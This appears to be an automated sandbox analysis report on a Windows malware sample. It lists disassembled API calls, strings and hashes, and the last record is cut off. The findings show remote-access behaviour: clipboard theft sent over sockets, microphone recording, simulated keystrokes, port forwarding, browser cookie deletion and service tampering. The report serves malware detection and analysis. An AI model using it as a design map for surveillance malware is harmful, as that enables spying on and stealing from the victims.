                        • __freea.LIBCMT ref: 004511EF
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                        • String ID:
                        • API String ID: 201697637-0
                        • Opcode ID: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                        • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                        • Opcode Fuzzy Hash: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                        • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                        • _memcmp.LIBVCRUNTIME ref: 00442935
                        • _free.LIBCMT ref: 004429A6
                        • _free.LIBCMT ref: 004429BF
                        • _free.LIBCMT ref: 004429F1
                        • _free.LIBCMT ref: 004429FA
                        • _free.LIBCMT ref: 00442A06
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: _free$ErrorLast$_abort_memcmp
                        • String ID: C
                        • API String ID: 1679612858-1037565863
                        • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                        • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                        • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                        • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID:
                        • String ID: tcp$udp
                        • API String ID: 0-3725065008
                        • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                        • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                        • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                        • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: Eventinet_ntoa
                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                        • API String ID: 3578746661-168337528
                        • Opcode ID: c3d225834e3254adb17b52a5ed13ece1e9c6b305f91900c89a6b7ea0c4643d74
                        • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                        • Opcode Fuzzy Hash: c3d225834e3254adb17b52a5ed13ece1e9c6b305f91900c89a6b7ea0c4643d74
                        • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                        APIs
                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                          • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
                          • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                        • String ID: .part
                        • API String ID: 1303771098-3499674018
                        • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                        • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                        • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                        • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
                        • __alloca_probe_16.LIBCMT ref: 00447056
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
                        • __alloca_probe_16.LIBCMT ref: 0044713B
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                        • __freea.LIBCMT ref: 004471AB
                          • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                        • __freea.LIBCMT ref: 004471B4
                        • __freea.LIBCMT ref: 004471D9
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                        • String ID:
                        • API String ID: 3864826663-0
                        • Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                        • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                        • Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                        • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                        APIs
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                        • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: InputSend
                        • String ID:
                        • API String ID: 3431551938-0
                        • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                        • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                        • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                        • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                        APIs
                        • OpenClipboard.USER32 ref: 00414F41
                        • EmptyClipboard.USER32 ref: 00414F4F
                        • CloseClipboard.USER32 ref: 00414F55
                        • OpenClipboard.USER32 ref: 00414F5C
                        • GetClipboardData.USER32(0000000D), ref: 00414F6C
                        • GlobalLock.KERNEL32(00000000), ref: 00414F75
                        • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                        • CloseClipboard.USER32 ref: 00414F84
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                        • String ID:
                        • API String ID: 2172192267-0
                        • Opcode ID: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                        • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                        • Opcode Fuzzy Hash: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                        • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                        APIs
                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                        • __fassign.LIBCMT ref: 00447814
                        • __fassign.LIBCMT ref: 0044782F
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                        • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                        • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID:
                        • API String ID: 1324828854-0
                        • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                        • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                        • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                        • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        • API ID: _free
                        • String ID: $-E$$-E
                        • API String ID: 269201875-3140958853
                        • Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                        • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                        • Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                        • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                        APIs
                        • _strftime.LIBCMT ref: 00401D30
                          • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                        • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                        • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                        • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                        • String ID: %Y-%m-%d %H.%M$.wav
                        • API String ID: 3809562944-3597965672
                        • Opcode ID: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                        • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                        • Opcode Fuzzy Hash: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                        • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                        APIs
                          • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                          • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                          • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                        • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                        • API String ID: 1133728706-4073444585
                        • Opcode ID: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                        • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                        • Opcode Fuzzy Hash: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                        • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                        • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                        • Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                        • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                        APIs
                          • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                        • _free.LIBCMT ref: 0044E128
                          • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                          • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                        • _free.LIBCMT ref: 0044E133
                        • _free.LIBCMT ref: 0044E13E
                        • _free.LIBCMT ref: 0044E192
                        • _free.LIBCMT ref: 0044E19D
                        • _free.LIBCMT ref: 0044E1A8
                        • _free.LIBCMT ref: 0044E1B3
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                        • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                        • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                        • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                        APIs
                          • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                          • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                          • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                          • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                        • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCurrentOpenProcessQueryValue
                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                        • API String ID: 1866151309-2070987746
                        • Opcode ID: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                        • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                        • Opcode Fuzzy Hash: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                        • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
                        APIs
                        • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                        • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                        • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                        • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                        • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                        APIs
                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                        • GetLastError.KERNEL32 ref: 0040AA28
                        Strings
                        • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                        • UserProfile, xrefs: 0040A9EE
                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                        • [Chrome Cookies not found], xrefs: 0040AA42
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        • API String ID: 2018770650-304995407
                        • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                        • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                        • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                        • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                        APIs
                        • __allrem.LIBCMT ref: 00438A09
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                        • __allrem.LIBCMT ref: 00438A3C
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                        • __allrem.LIBCMT ref: 00438A71
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1992179935-0
                        • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                        • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                        • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                        • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __cftoe
                        • String ID:
                        • API String ID: 4189289331-0
                        • Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                        • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                        • Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                        • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16_free
                        • String ID: a/p$am/pm
                        • API String ID: 2936374016-3206640213
                        • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                        • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                        • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                        • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                        • int.LIBCPMT ref: 0040F8D7
                          • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                          • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                        • std::_Facet_Register.LIBCPMT ref: 0040F917
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                        • __Init_thread_footer.LIBCMT ref: 0040F97F
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                        • String ID:
                        • API String ID: 3815856325-0
                        • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                        • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                        • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                        • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                        • String ID:
                        • API String ID: 493672254-0
                        • Opcode ID: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                        • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                        • Opcode Fuzzy Hash: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                        • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                        APIs
                        • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                        • _free.LIBCMT ref: 0044575C
                        • _free.LIBCMT ref: 00445784
                        • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                        • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                        • _abort.LIBCMT ref: 004457A3
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free$_abort
                        • String ID:
                        • API String ID: 3160817290-0
                        • Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
